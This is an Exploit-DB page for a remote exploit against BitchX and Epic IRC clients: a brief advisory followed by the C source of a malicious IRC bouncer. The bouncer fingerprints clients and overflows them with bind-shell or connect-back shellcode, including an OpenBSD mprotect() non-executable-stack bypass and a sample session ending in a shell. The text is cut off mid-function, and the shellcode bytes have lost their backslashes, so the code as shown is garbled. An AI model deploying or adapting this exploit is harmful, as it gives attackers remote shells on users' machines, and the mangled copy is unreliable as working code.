https://www.exploit-db.com/exploits/22353

漏洞细节尚未披露

source: http://www.securityfocus.com/bid/7097/info

A memory corruption vulnerability has been discovered in BitchX 1.0c19. This issue occurs when handling server-supplied data and may cause characters to be written to sensitive stack memory. As a result, it may be possible for a malicious IRC server to execute arbitrary commands on a vulnerable client. 

This vulnerability has been reported to affect BitchX 1.0c19. Other versions may also be affected.

/* _ ________ _____ ______ 06-03-2003
 __ ___ ____ /____.------` /_______.------.___.----` ___/____ ____
___
 _/  _ / __. __// ___/_ ___. /_ /_ | _/
 ___ ._ . \ /__ _____/ _ / _ | /__ | _| slc | _____
 _
 - -------______||--._____---._______//-|__ //-.___|----._____||
 /  /
 remote BitchX/Epic Exploit (serverside) / by eSDee of Netric
 ------------------------------------------------------------------------------
-
 (www.netric.be|org)

 "gespuis.c" is an irc bouncer, that can exploit BitchX/Epic clients.
 Copyright (c) 2003 Netric Security
 All rights reserved.

 [esdee@flopppp]$ ./gespuis -v irc.netric.org
 [remote BitchX/Epic exploit (serverside) by eSDee of Netric
(www.netric.be|org)]
 ------------------------------------------------------------------------------
-
 Verbose mode.
 Waiting for connections...
 [10.0.0.2] Connected... [esdee]
 [10.0.0.2] Sending CTCP VERSION...
 [10.0.0.2] Client version: BitchX-1.0c17+ by panasync - OpenBSD 3.2
 [10.0.0.2] Target found. [ret: 0xcfbf7c1c]
 [10.0.0.2] Bindshell is running on port 0xb0ef(45295).

 [esdee@flopppp]$ telnet 10.0.0.2 45295
 Trying 10.0.0.2...
 Connected to 10.0.0.2.
 Escape character is '^]'.
 uname -a; id;
 OpenBSD pant0ffel 3.2 pant0ffel#1 i386
 uid=1000(esdee) gid=1000(esdee) groups=1000(esdee), 0(wheel)
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <signal.h>
#include <unistd.h>
#include <netdb.h>
#include <ctype.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <sys/socket.h>

char
jmp_code[] =

 /* jumps 0xff bytes ahead.. */
 "xebx09x58x31xdbxb3xffx01xd8xffxe0xe8xf2xffxffxff";

char
BSD_bindcode[] =

 /* fork(), execve sh -c [client] [host to bounce to], term=xterm */
 "x31xc0x31xffxb0x02xcdx80x39xc7x74x7ex31xc0x50"
 "x68x20x20x20x20x68x20x20x20x20x68x20x20x20x20"
 "x68x20x20x20x20x68x20x20x20x20x68x20x20x20x20"
 "x68x20x20x20x20x68x20x20x20x20x68x20x20x20x20"
 "x68x20x20x20x20x89xe1x50x66x68x2dx63x89xe3x50"
 "x66x68x73x68x89xe0x57x51x53x50x89xe1x31xc0x50"
 "x66x68x72x6dx68x3dx78x74x65x68x54x45x52x4dx89"
 "xe2x50x52x89xe2x57x68x6ex2fx73x68x68x2fx2fx62"
 "x69x89xe3x50x52x51x53x50xb0x3bxcdx80x31xc0xb0"
 "x01xcdx80"

 /* forking bindcode (port 0xb0ef)*/
 "x31xc0x31xdbx53xb3x06x53xb3x01x53xb3x02x53x54xb0"
 "x61xcdx80x89xc7x31xc0x50x50x50x66x68xb0xefxb7x02"
 "x66x53x89xe1x31xdbxb3x10x53x51x57x50xb0x68xcdx80"
 "x31xdbx39xc3x74x06x31xc0xb0x01xcdx80x31xc0x50x57"
 "x50xb0x6axcdx80x31xc0x31xdbx50x89xe1xb3x01x53x89"
 "xe2x50x51x52xb3x14x53x50xb0x2excdx80x31xc0x50x50"
 "x57x50xb0x1excdx80x89xc6x31xc0x31xdbxb0x02xcdx80"
 "x39xc3x75x44x31xc0x57x50xb0x06xcdx80x31xc0x50x56"
 "x50xb0x5axcdx80x31xc0x31xdbx43x53x56x50xb0x5axcd"
 "x80x31xc0x43x53x56x50xb0x5axcdx80x31xc0x50x68x2f"
 "x2fx73x68x68x2fx62x69x6ex89xe3x50x54x53x50xb0x3b"
 "xcdx80x31xc0xb0x01xcdx80x31xc0x56x50xb0x06xcdx80"
 "xebx9a";

char
BSD_connect_back[] =

 /* fork(), execve sh -c [client] [host to bounce to], term=xterm */
 "x31xc0x31xffxb0x02xcdx80x39xc7x74x7ex31xc0x50"
 "x68x20x20x20x20x68x20x20x20x20x68x20x20x20x20"
 "x68x20x20x20x20x68x20x20x20x20x68x20x20x20x20"
 "x68x20x20x20x20x68x20x20x20x20x68x20x20x20x20"
 "x68x20x20x20x20x89xe1x50x66x68x2dx63x89xe3x50"
 "x66x68x73x68x89xe0x57x51x53x50x89xe1x31xc0x50"
 "x66x68x72x6dx68x3dx78x74x65x68x54x45x52x4dx89"
 "xe2x50x52x89xe2x57x68x6ex2fx73x68x68x2fx2fx62"
 "x69x89xe3x50x52x51x53x50xb0x3bxcdx80x31xc0xb0"
 "x01xcdx80"

 /* connect back shellcode (port=0xb0ef) */
 "x31xc0x31xdbx53xb3x06x53xb3x01x53xb3x02x53x54xb0"
 "x61xcdx80x31xd2x52x52x68x41x41x41x41x66x68xb0xef"
 "xb7x02x66x53x89xe1xb2x10x52x51x50x52x89xc2x31xc0"
 "xb0x62xcdx80x31xdbx39xc3x74x06x31xc0xb0x01xcdx80"
 "x31xc0x50x52x50xb0x5axcdx80x31xc0x31xdbx43x53x52"
 "x50xb0x5axcdx80x31xc0x43x53x52x50xb0x5axcdx80x31"
 "xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x54"
 "x53x50xb0x3bxcdx80x31xc0xb0x01xcdx80";

char
linux_bindcode[] =

 /* fork(), execve sh -c [client] [host to bounce to], term=xterm */
 "x31xc0x31xffxb0x02xcdx80x39xc7x74x7ex31xc0x50"
 "x68x20x20x20x20x68x20x20x20x20x68x20x20x20x20"
 "x68x20x20x20x20x68x20x20x20x20x68x20x20x20x20"
 "x68x20x20x20x20x68x20x20x20x20x68x20x20x20x20"
 "x68x20x20x20x20x68x20x20x20x20x89xe1x50x66x68"
 "x2dx63x89xe3x50x66x68x73x68x89xe0x57x51x53x50"
 "x89xe1x31xc0x50x66x68x72x6dx68x3dx78x74x65x68"
 "x54x45x52x4dx89xe2x50x52x89xe2x57x68x6ex2fx73"
 "x68x68x2fx2fx62x69x89xe3xb0x0bxcdx80x31xc0xb0"
 "x01xcdx80"

 /* forking bindcode (port 0xb0ef)*/
 "x31xc0x31xdbx31xc9x51xb1x06x51xb1x01x51xb1x02x51"
 "x89xe1xb3x01xb0x66xcdx80x89xc1x31xc0x31xdbx50x50"
 "x50x66x68xb0xefxb3x02x66x53x89xe2xb3x10x53xb3x02"
 "x52x51x89xcax89xe1xb0x66xcdx80x31xdbx39xc3x74x05"
 "x31xc0x40xcdx80x31xc0x50x52x89xe1xb3x04xb0x66xcd"
 "x80x89xd7x31xc0x31xdbx31xc9xb3x11xb1x01xb0x30xcd"
 "x80x31xc0x31xdbx50x50x57x89xe1xb3x05xb0x66xcdx80"
 "x89xc6x31xc0x31xdbxb0x02xcdx80x39xc3x75x40x31xc0"
 "x89xfbxb0x06xcdx80x31xc0x31xc9x89xf3xb0x3fxcdx80"
 "x31xc0x41xb0x3fxcdx80x31xc0x41xb0x3fxcdx80x31xc0"
 "x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x8bx54x24"
 "x08x50x53x89xe1xb0x0bxcdx80x31xc0x40xcdx80x31xc0"
 "x89xf3xb0x06xcdx80xebx99";

char
linux_connect_back[] =

 /* fork(), execve sh -c [client] [host to bounce to], term=xterm */
 "x31xc0x31xffxb0x02xcdx80x39xc7x74x7ex31xc0x50"
 "x68x20x20x20x20x68x20x20x20x20x68x20x20x20x20"
 "x68x20x20x20x20x68x20x20x20x20x68x20x20x20x20"
 "x68x20x20x20x20x68x20x20x20x20x68x20x20x20x20"
 "x68x20x20x20x20x68x20x20x20x20x89xe1x50x66x68"
 "x2dx63x89xe3x50x66x68x73x68x89xe0x57x51x53x50"
 "x89xe1x31xc0x50x66x68x72x6dx68x3dx78x74x65x68"
 "x54x45x52x4dx89xe2x50x52x89xe2x57x68x6ex2fx73"
 "x68x68x2fx2fx62x69x89xe3xb0x0bxcdx80x31xc0xb0"
 "x01xcdx80"

 /* connect back shellcode (port=0xb0ef) */
 "x31xc0x31xdbx31xc9x51xb1x06x51xb1x01x51xb1x02x51"
 "x89xe1xb3x01xb0x66xcdx80x89xc2x31xc0x31xc9x51x51"
 "x68x41x42x43x44x66x68xb0xefxb1x02x66x51x89xe7xb3"
 "x10x53x57x52x89xe1xb3x03xb0x66xcdx80x31xc9x39xc1"
 "x74x06x31xc0xb0x01xcdx80x31xc0xb0x3fx89xd3xcdx80"
 "x31xc0xb0x3fx89xd3xb1x01xcdx80x31xc0xb0x3fx89xd3"
 "xb1x02xcdx80x31xc0x31xd2x50x68x6ex2fx73x68x68x2f"
 "x2fx62x69x89xe3x50x53x89xe1xb0x0bxcdx80x31xc0xb0"
 "x01xcdx80";

struct {
 char *version;
 unsigned long ret;
 unsigned long mprotect;
 char *shellcode;
 int type;
} targets[] = {

 /* FreeBSD targets tested on:
 - FreeBSD 4.7-RELEASE-p3
 - FreeBSD 4.6.2-RELEASE
 - FreeBSD 4.6
 - FreeBSD 4.5-RELEASE

 OpenBSD targets:
 - OpenBSD 3.2
 - OpenBSD 3.1
 - OpenBSD 3.0
 - OpenBSD 2.x

 Linux targets:
 - Redhat 8.0
 - Redhat 7.x
 - Debian 3.0
 - Mandrake 8.x
 - Mandrake 9.0
 - Slackware 8.x
 - Trustix 1.x

 Types:
 0 - BitchX (Linux)
 1 - BitchX (BSD)
 2 - BitchX (BSD - Return into libc - mprotect() (To break the k-rad
theo protection :)
 3 - Epic (Linux)
 4 - Epic (BSD)
 5 - Epic (BSD - Return into libc - mprotect())
 */

 /* Auto targets */

 { "BitchX-1.0c19+ by panasync - Linux 2.", 0xbfff9bd8, 0x00000000,
linux_bindcode, 0},
 { "BitchX-1.0c18+ by panasync - Linux 2.", 0xbfff9bd8, 0x00000000,
linux_bindcode, 0},
 { "BitchX-1.0c17+ by panasync - Linux 2.", 0xbfff9bd8, 0x00000000,
linux_bindcode, 0},
 { "BitchX-1.0c16+ by panasync - Linux 2.", 0xbfff9bd8, 0x00000000,
linux_bindcode, 0},
 { "BitchX-1.0c19+ by panasync - FreeBSD 5", 0xbfbf9c8c, 0x00000000,
BSD_bindcode, 1},
 { "BitchX-1.0c18+ by panasync - FreeBSD 5", 0xbfbf9c8c, 0x00000000,
BSD_bindcode, 1},
 { "BitchX-1.0c17+ by panasync - FreeBSD 5", 0xbfbf9c8c, 0x00000000,
BSD_bindcode, 1},
 { "BitchX-1.0c16+ by panasync - FreeBSD 5", 0xbfbf9c8c, 0x00000000,
BSD_bindcode, 1},
 { "BitchX-1.0c19+ by panasync - FreeBSD 4", 0xbfbf9c8c, 0x00000000,
BSD_bindcode, 1},
 { "BitchX-1.0c18+ by panasync - FreeBSD 4", 0xbfbf9c8c, 0x00000000,
BSD_bindcode, 1},
 { "BitchX-1.0c17+ by panasync - FreeBSD 4", 0xbfbf9c8c, 0x00000000,
BSD_bindcode, 1},
 { "BitchX-1.0c16+ by panasync - FreeBSD 4", 0xbfbf9c8c, 0x00000000,
BSD_bindcode, 1},
 { "BitchX-1.0c19+ by panasync - OpenBSD 3.2", 0xcfbf7c1c, 0x401ec230,
BSD_bindcode, 2},
 { "BitchX-1.0c18+ by panasync - OpenBSD 3.2", 0xcfbf7c1c, 0x401ce230,
BSD_bindcode, 2},
 { "BitchX-1.0c17+ by panasync - OpenBSD 3.2", 0xcfbf7c1c, 0x401cb230,
BSD_bindcode, 2},
 { "BitchX-1.0c16+ by panasync - OpenBSD 3.2", 0xcfbf7c1c, 0x401cb230,
BSD_bindcode, 2},
 { "BitchX-1.0c19+ by panasync - OpenBSD 3", 0xdfbf7f34, 0x00000000,
BSD_bindcode, 1},
 { "BitchX-1.0c18+ by panasync - OpenBSD 3", 0xdfbf7f34, 0x00000000,
BSD_bindcode, 1},
 { "BitchX-1.0c17+ by panasync - OpenBSD 3", 0xdfbf7f34, 0x00000000,
BSD_bindcode, 1},
 { "BitchX-1.0c16+ by panasync - OpenBSD 3", 0xdfbf7f34, 0x00000000,
BSD_bindcode, 1},
 { "BitchX-1.0c19+ by panasync - OpenBSD 2", 0xdfbf7f34, 0x00000000,
BSD_bindcode, 1},
 { "BitchX-1.0c18+ by panasync - OpenBSD 2", 0xdfbf7f34, 0x00000000,
BSD_bindcode, 1},
 { "BitchX-1.0c17+ by panasync - OpenBSD 2", 0xdfbf7f34, 0x00000000,
BSD_bindcode, 1},
 { "BitchX-1.0c16+ by panasync - OpenBSD 2", 0xdfbf7f34, 0x00000000,
BSD_bindcode, 1},
 { "ircII EPIC4-1.1.10 Linux 2.", 0xbfffddf0, 0x00000000, linux_bindcode,
3},
 { "ircII EPIC4-1.1.7 Linux 2.", 0xbfffddf0, 0x00000000, linux_bindcode,
3},
 { "ircII EPIC4-1.1.6 Linux 2.", 0xbfffddf0, 0x00000000, linux_bindcode,
3},
 { "ircII EPIC4-1.1.10 FreeBSD 4", 0xbfbfdf64, 0x00000000, BSD_bindcode,
4},
 { "ircII EPIC4-1.1.7 FreeBSD 4", 0xbfbfdf64, 0x00000000, BSD_bindcode,
4},
 { "ircII EPIC4-1.1.6 FreeBSD 4", 0xbfbfdf64, 0x00000000, BSD_bindcode,
4},
 { "ircII EPIC4-1.1.10 OpenBSD 3.2", 0xcfbf6d74, 0x4026b230,
BSD_bindcode, 5},
 { "ircII EPIC4-1.1.7 OpenBSD 3.2", 0xcfbfbe64, 0x40265230, BSD_bindcode,
5},
 { "ircII EPIC4-1.1.6 OpenBSD 3.2", 0xcfbfbe64, 0x40264230, BSD_bindcode,
5},
 { "ircII EPIC4-1.1.10 OpenBSD 3", 0xdfbf7094, 0x00000000, BSD_bindcode,
4},
 { "ircII EPIC4-1.1.7 OpenBSD 3", 0xdfbf7094, 0x00000000, BSD_bindcode,
4},
 { "ircII EPIC4-1.1.6 OpenBSD 3", 0xdfbf7094, 0x00000000, BSD_bindcode,
4},

 /* manual targets (thanks lucipher and thorax!) */

 { "BitchX-1.0cX - Redhat 8.0", 0xbfff9bd8, 0x00000000, linux_bindcode,
1},
 { "BitchX-1.0cX - Redhat 7.x", 0xbfff9bd8, 0x00000000, linux_bindcode,
1},
 { "BitchX-1.0cX - Debian 3.x", 0xbfff9f0c, 0x00000000, linux_bindcode,
1},
 { "BitchX-1.0cX - Mandrake 9.0", 0xbfff9af0, 0x00000000, linux_bindcode,
1},
 { "BitchX-1.0cX - Mandrake 8.x", 0xbfff9af0, 0x00000000, linux_bindcode,
1},
 { "BitchX-1.0cX - Slackware 8.x", 0xbfff9bd8, 0x00000000,
linux_bindcode, 1},
 { "BitchX-1.0cX - Trustix 1.x", 0x7fff9ddc, 0x00000000, linux_bindcode,
1},
 { "ircII EPIC4-1.1.x Redhat 8.0", 0xbfffdf64, 0x00000000,
linux_bindcode, 3},
 { "ircII EPIC4-1.1.x Redhat 7.x", 0xbfffdf64, 0x00000000,
linux_bindcode, 3},
 { "ircII EPIC4-1.1.x Debian 3.x", 0xbfff9004, 0x00000000,
linux_bindcode, 3},
 { "ircII EPIC4-1.1.x Mandrake 9.0", 0xbfffdf10, 0x00000000,
linux_bindcode, 3},
 { "ircII EPIC4-1.1.x Mandrake 8.x", 0xbfffdf10, 0x00000000,
linux_bindcode, 3},
 { "ircII EPIC4-1.1.x Slackware 8.x", 0xbfffddf0, 0x00000000,
linux_bindcode, 3},
 { "ircII EPIC4-1.1.x Trustix 1.x", 0x7fff8f74, 0x00000000,
linux_bindcode, 3},
 { "Crash - All platforms", 0xBADe5Dee, 0x00000000, linux_bindcode, 0},
};

FILE *log = NULL;

void
usage(char *prog)
{
 fprintf(stderr, "Usage : %s [-c ip address] [-l file] [-p port] [-t
target] [-v] <ircd:port>n"
 "Example: %s -l /var/log/owned -p 6667 -v irc.netric.org:6668nn"
 "-c ip address connect back shellcode (port 45295)n"
 "-l logfile log output to filen"
 "-p port the bouncer portn"
 "-t target force target, don't CTCP version. (Use -t0 for a list)n"
 "-v verbose modenn", prog, prog);
 exit(1);
}

int
send_text(int sock, char *format, ... )
{
 char buffer[4096];
 va_list arglist;
 va_start (arglist, format);
 vsnprintf(buffer, sizeof(buffer) - 1, format, arglist );
 va_end(arglist);
 return send(sock, buffer, strlen(buffer), 0);
}

int
main(int argc, char *argv[])
{
 char read_buf [4096];
 char log_buffer [1200];
 char ret_buffer [128];
 char buffer [600];

 char sh_buffer [2000];
 char sh_host [36];

 char version [256];
 char nick [256];
 char user [256];
 char ircd_host [256];

 char *ptr;

 unsigned int port = 6667;
 unsigned int ircd_port = 6667;
 unsigned int type = 0;
 unsigned int bytes = 0;

 struct sockaddr_in saddr_in1;
 struct sockaddr_in saddr_in2;
 struct sockaddr_in saddr_in3;

 struct hostent *hp;

 int sock_server = 0;
 int sock_server_new = 0;
 int sock_ircd = 0;

 int sin_size = sizeof(struct sockaddr_in);
 int i = 0;
 int k = 0;
 int size = 0;
 int opt = 0;
 int verbose = 0;
 int connectback = 0;
 int ip1 = 0;
 int ip2 = 0;
 int ip3 = 0;
 int ip4 = 0;

 fd_set fd_read;

 fprintf(stdout, "[remote BitchX/Epic exploit (serverside) by eSDee of
Netric (www.netric.be|org)]n"
 "-----------------------------------------------------------------------------
--n");

 while((opt = getopt(argc,argv,"c:l:p:t:v")) !=EOF) {
 switch(opt) {

 case 'c':
 sscanf(optarg, "%d.%d.%d.%d", &ip1, &ip2, &ip3, &ip4);

 linux_connect_back[171] = ip1; BSD_connect_back[162] = ip1;
 linux_connect_back[172] = ip2; BSD_connect_back[163] = ip2;
 linux_connect_back[173] = ip3; BSD_connect_back[164] = ip3;
 linux_connect_back[174] = ip4; BSD_connect_back[165] = ip4;

 for(i = 0; i < sizeof(targets) / 20; i++) {
 switch(targets[i].type) {
 case 0:
 targets[i].shellcode = linux_connect_back;
 break;
 case 3:
 targets[i].shellcode = linux_connect_back;
 break;
 default:
 targets[i].shellcode = BSD_connect_back;
 break;
 }
 }

 fprintf(stdout, "Connecting to: %d.%d.%d.%d:45295n", ip1, ip2, ip3,
ip4);
 connectback = 1;
 break;
 case 'l':
 if ((log = fopen(optarg,"aw")) == NULL) {
 fprintf(stderr, "Unable to open %s.n", optarg);
 return -1;
 }
 break;
 case 'p':
 port=atoi(optarg);
 if ((port <= 0) || (port > 65535)) {
 fprintf(stderr,"Invalid port.n");
 return -1;
 }
 break;
 case 't':
 type = atoi(optarg);
 if (type == 0 || type > sizeof(targets) / 20) {
 for(i = 0; i < sizeof(targets) / 20; i++)
 fprintf(stderr, "%02d. [0x%08x] - %sn", i + 1,
 (unsigned)targets[i].ret, targets[i].version);
 fprintf(stderr, "n");
 return -1;
 }

 fprintf(stdout, "Selected: %s [0x%08x]n", targets[type - 1].version,
(unsigned)targets[type - 1].ret);
 break;
 case 'v':
 fprintf(stdout, "Verbose mode.n");
 verbose = 1;
 break;
 default:
 usage(argv[0] == NULL ? "gespuis" : argv[0]);
 break;
 }
 }

 if (argv[optind] == NULL) usage(argv[0] == NULL ? "gespuis" : argv[0]);


 sscanf(argv[optind], "%255[^:]:%u", ircd_host, &ircd_port);

 if ((ircd_port <= 0) || (ircd_port > 65535)) {
 fprintf(stderr,"Invalid ircd port.n");
 return -1;
 }

 if ((hp = gethostbyname(ircd_host)) == NULL) {
 fprintf(stderr, "Unable to resolve %s...n", ircd_host);
 return -1;
 }

 memset((char *)&saddr_in3, 0x0, sizeof(saddr_in3));
 memcpy((char *)&saddr_in3.sin_addr, hp->h_addr, hp->h_length);

 saddr_in3.sin_family = AF_INET;
 saddr_in3.sin_port = htons(ircd_port);

 if ((sock_server = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
 fprintf(stderr, "socket error.n");
 return -1;
 }

 setsockopt(sock_server, SOL_SOCKET, SO_REUSEADDR, &sin_size,
sizeof(sin_size));

 saddr_in1.sin_family = AF_INET;
 saddr_in1.sin_port = htons(port);
 saddr_in1.sin_addr.s_addr = INADDR_ANY;

 memset(&saddr_in1.sin_zero, 0x0, 8);

 if (bind(sock_server, (struct sockaddr *)&saddr_in1, sizeof(struct
sockaddr)) == -1) {
 fprintf(stderr, "bind error.n");
 return -1;
 }

 if (listen(sock_server, 10) == -1) {
 fprintf(stderr, "listen.n");
 return -1;
 }

 signal(SIGCHLD, SIG_IGN);

 fprintf(stdout, "Waiting for connections...n");

 while(1) {

 if ((sock_server_new = accept(sock_server, (struct sockaddr
*)&saddr_in2, &sin_size)) == -1) {
 perror("accept");
 continue;
 }

 if (!fork()) {

 close(sock_server);

 memset(version, 0x0, sizeof(version));
 memset(read_buf, 0x0, sizeof(read_buf));

 while(1) {

 if (recv(sock_server_new, read_buf, sizeof(read_buf) - 1, 0) < 0) {
 close(sock_server_new);
 exit(1);
 }

 ptr = strstr(read_buf, "NICK ");

 if (ptr != NULL) {
 memset(nick, 0x00, sizeof(nick));
 strncpy(nick, ptr + 5, sizeof(nick) - 1);

 for (i = 0; i < strlen(nick); i++)
 if(!isprint(nick[i])) nick[i] = 0x00;

 if (verbose == 1) fprintf(stdout, "[%s] Connected... [%s]n",
 inet_ntoa(saddr_in2.sin_addr), nick);
 }

 ptr = strstr(read_buf, "USER ");
 
 if (ptr != NULL) {
 memset(user, 0x00, sizeof(user));
 strncpy(user, ptr + 5, sizeof(user) - 1);
 
 for (i = 0; i < strlen(user); i++)
 if (!isprint(user[i])) user[i] = 0x00;
 }

 if (strlen(nick) != 0 && strlen(user) != 0) break;
 memset(read_buf, 0x0, sizeof(read_buf));
 }

 if (type == 0) {

 if (verbose == 1) fprintf(stdout, "[%s] Sending CTCP VERSION...n",
inet_ntoa(saddr_in2.sin_addr));

 if (send_text(sock_server_new, ":[email protected] PRIVMSG a:
%cVERSION%cn", 0x01, 0x01) < 0) {
 if (verbose == 1) fprintf(stderr, "[%s] send failed!n",
inet_ntoa(saddr_in2.sin_addr));
 close(sock_server_new);
 exit(1);
 }

 while(1) {

 if (recv(sock_server_new, read_buf, sizeof(read_buf) - 1, 0) < 0) {
 close(sock_server_new);
 exit(1);
 }

 ptr = strstr(read_buf, "VERSION ");

 if (ptr != NULL) {

 for (i = 0; i < sizeof(version) - 1; i++) {
 if (isprint(*(ptr + i + 8))) {
 version[k] = *(ptr + i + 8);
 k++;
 }

 if (*(ptr + i + 8) == ':' && *(ptr + i + 7) == ' ') {
 version[k - 2] = 0x00;
 break;
 }

 if (*(ptr + i + 8) == '-' && *(ptr + i + 9) == ' ' &&
 *(ptr + i + 10) == 'A' && *(ptr + i + 11) == 'c') {
 version[k - 2] = 0x00;
 break;
 }
 }

 if (verbose == 1) fprintf(stdout, "[%s] Client version: %sn",
inet_ntoa(saddr_in2.sin_addr), version);
 break;
 }

 memset(read_buf, 0x0, sizeof(read_buf))
;
 }

 if (strlen(version) == 0) {
 if (verbose == 1) fprintf(stderr, "[%s] No version given.n",
inet_ntoa(saddr_in2.sin_addr));
 close(sock_server_new);
 exit(1);
 }

 for(i = 0; i < (sizeof(targets) / 20) - 1; i++) {
 if (memcmp(version, targets[i].version, strlen(targets[i].version)) ==
0) {
 type = i + 1;
 if (verbose == 1) fprintf(stderr, "[%s] Target found. [ret: 0x%08x]n",
 inet_ntoa(saddr_in2.sin_addr), (unsigned) targets[type - 1].ret);
 break;
 }
 }

 if (type == 0) {
 if (verbose == 1) fprintf(stderr, "[%s] Not found, bouncing to [%s:%u]
...n",
 inet_ntoa(saddr_in2.sin_addr),ircd_host, ircd_port);

 if ((sock_ircd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
 if (verbose == 1) fprintf(stderr, "[%s] socket error.n",
 inet_ntoa(saddr_in2.sin_addr));
 close(sock_server_new);
 exit(1);
 }

 if (connect(sock_ircd, (struct sockaddr *)&saddr_in3, sizeof(saddr_in3))
== -1) {
 if (verbose == 1) fprintf(stderr, "[%s] Unable to connect to
[%s:%u].n",
 inet_ntoa(saddr_in2.sin_addr), ircd_host, ircd_port);
 close(sock_server_new);
 close(sock_ircd);
 exit(1);
 }

 memset(log_buffer, 0x00, sizeof(log_buffer));
 snprintf(log_buffer, sizeof(log_buffer) - 1,
 "NICK %snUSER %sn", nick, user);
 

 if (send(sock_ircd, log_buffer, strlen(log_buffer), 0) < 0) {
 close(sock_server_new);
 close(sock_ircd);
 exit(1);
 }

 memset(read_buf, 0x00, sizeof(read_buf));
 bytes = 1;
 while (bytes) {

 FD_ZERO(&fd_read);
 FD_SET(sock_server_new, &fd_read);
 FD_SET(sock_ircd, &fd_read);

 select(FD_SETSIZE, &fd_read, NULL, NULL, NULL);

 if (FD_ISSET(sock_ircd, &fd_read)) {

 memset(read_buf, 0x00, sizeof(read_buf));
 bytes = recv(sock_ircd, read_buf, sizeof(read_buf), 4);
 if (bytes) send(sock_server_new, read_buf, bytes, 4);

 } else if (FD_ISSET(sock_server_new, &fd_read)) {

 memset(&read_buf, 0x00, sizeof(read_buf));
 bytes = recv(sock_server_new, read_buf, sizeof(read_buf), 4);
 if (bytes) send(sock_ircd, read_buf, bytes, 4);
 }
 }

 close(sock_ircd);
 close(sock_server_new);
 exit(1);
 }
 }

 k = 69;
 i = 0;

 memset(sh_host, 0x00, sizeof(sh_host));
 if (targets[type - 1].type < 3) {
 snprintf(sh_host, sizeof(sh_host) - 1, "BitchX %s:%d", ircd_host,
ircd_port);
 } else {
 snprintf(sh_host, sizeof(sh_host) - 1, "epic %s:%d", ircd_host,
ircd_port);
 }

 strncat(sh_host, " ",
 sizeof(sh_host) - strlen(sh_host) - 1);
 while (1) {

 if (sh_host[i + 0] == 0x00) break;
 linux_bindcode[k - 3] = sh_host[i + 0];
 linux_connect_back[k - 3] = sh_host[i + 0];


 if (sh_host[i + 1] == 0x00) break;
 linux_bindcode[k - 2] = sh_host[i + 1];
 linux_connect_back[k - 2] = sh_host[i + 1];

 if (sh_host[i + 2] == 0x00) break;
 linux_bindcode[k - 1] = sh_host[i + 2];
 linux_connect_back[k - 1] = sh_host[i + 2];

 if (sh_host[i + 3] == 0x00) break;
 linux_bindcode[k - 0] = sh_host[i + 3];
 linux_connect_back[k - 0] = sh_host[i + 3];

 k -= 5;
 i += 4;
 }

 k = 64;
 i = 0;

 while (1) {

 if (sh_host[i + 0] == 0x00) break;
 BSD_bindcode[k - 3] = sh_host[i + 0];
 BSD_connect_back[k - 3] = sh_host[i + 0];

 if (sh_host[i + 1] == 0x00) break;
 BSD_bindcode[k - 2] = sh_host[i + 1];
 BSD_connect_back[k - 2] = sh_host[i + 1];

 if (sh_host[i + 2] == 0x00) break;
 BSD_bindcode[k - 1] = sh_host[i + 2];
 BSD_connect_back[k - 1] = sh_host[i + 2];

 if (sh_host[i + 3] == 0x00) break;
 BSD_bindcode[k - 0] = sh_host[i + 3];
 BSD_connect_back[k - 0] = sh_host[i + 3];

 k -= 5;
 i += 4;
 }

 k = 0;

 usleep(3000000); /* We have to wait a couple of seconds,
 otherwise BitchX/Epic will ignore the clientinfo CTCP. */

 memset(sh_buffer, 0x90, sizeof(sh_buffer));
 memcpy(sh_buffer + sizeof(sh_buffer) - 1 - strlen(targets[type -
1].shellcode),
 targets[type - 1].shellcode, strlen(targets[type - 1].shellcode));
 sh_buffer[sizeof(sh_buffer) - 1] = 0x0;

 if (send_text(sock_server_new, ":[email protected] PRIVMSG a:
%srn", sh_buffer) < 0) {
 if (verbose == 1) fprintf(stderr, "[%s] send failed!n",
inet_ntoa(saddr_in2.sin_addr));
 exit(1);
 }

 usleep(300000);

 if (targets[type - 1].type == 2 || targets[type - 1].type == 5) {

 /* OpenBSD 3.2!

 Quote:

 "As theo announced on misc@, non-executable stack support is available
in the most
 recent snapshots for most platforms. In other words, say goodbye to the
vast majority
 of buffer overflow attacks against OpenBSD machines :-) "

 The stack is non executable at default, so we use a return into libc
technic,
 to get the stack executable again. We use the mprotect() function in
libc,
 to mark the stack PROT_WRITE|PROT_READ|PROT_EXEC ;)

 */
 size = -1;
 memset(ret_buffer, 0x90, sizeof(ret_buffer));
 memcpy(ret_buffer + 28, &targets[type - 1].mprotect, 4);
 memcpy(ret_buffer + 32, &targets[type - 1].ret, 4);
 memcpy(ret_buffer + 36, &targets[type - 1].ret, 4); // void *addr
 memcpy(ret_buffer + 40, &size, 4);
 // size_t len
 ret_buffer[44] = 0x07;
 // int prot
 ret_buffer[200] = 0x00;

 } else {

 memset(ret_buffer, 0x0, sizeof(ret_buffer));

 for(i = 0; i < sizeof(ret_buffer) - 4; i += 4)
 {
 ret_buffer[i + 0] = (targets[type - 1].ret >> 0) & 0xff;
 ret_buffer[i + 1] = (targets[type - 1].ret >> 8) & 0xff;
 ret_buffer[i + 2] = (targets[type - 1].ret >> 16) & 0xff;
 ret_buffer[i + 3] = (targets[type - 1].ret >> 24) & 0xff;
 }
 }

 memset(buffer, 0x90, sizeof(buffer));
 memcpy(buffer - sizeof(jmp_code) - 2, jmp_code, sizeof(jmp_code) - 1);
 buffer[sizeof(buffer) - 1] = 0x00;

 if (send_text(sock_server_new,
 ":%[email protected] PRIVMSG a: %cCLIENTINFO %s%crn",
 buffer, 0x01, ret_buffer, 0x01) < 0) {
 if (verbose == 1) {
 fprintf(stderr, "[%s] send failed!n", inet_ntoa(saddr_in2.sin_addr));
 exit(1);
 }
 }

 if (connectback == 0) {
 if (log) fprintf(log, "[%s] %s - Bindshell is running on port
0xb0ef(45295).n",
 inet_ntoa(saddr_in2.sin_addr), nick);
 fprintf(stderr, "[%s] Bindshell is running on port 0xb0ef(45295).n",
 inet_ntoa(saddr_in2.sin_addr));
 } else {
 if (log) fprintf(log, "[%s] %s - Connecting to %d.%d.%d.%d:45295.n",
 inet_ntoa(saddr_in2.sin_addr), nick, ip1, ip2, ip3, ip4);
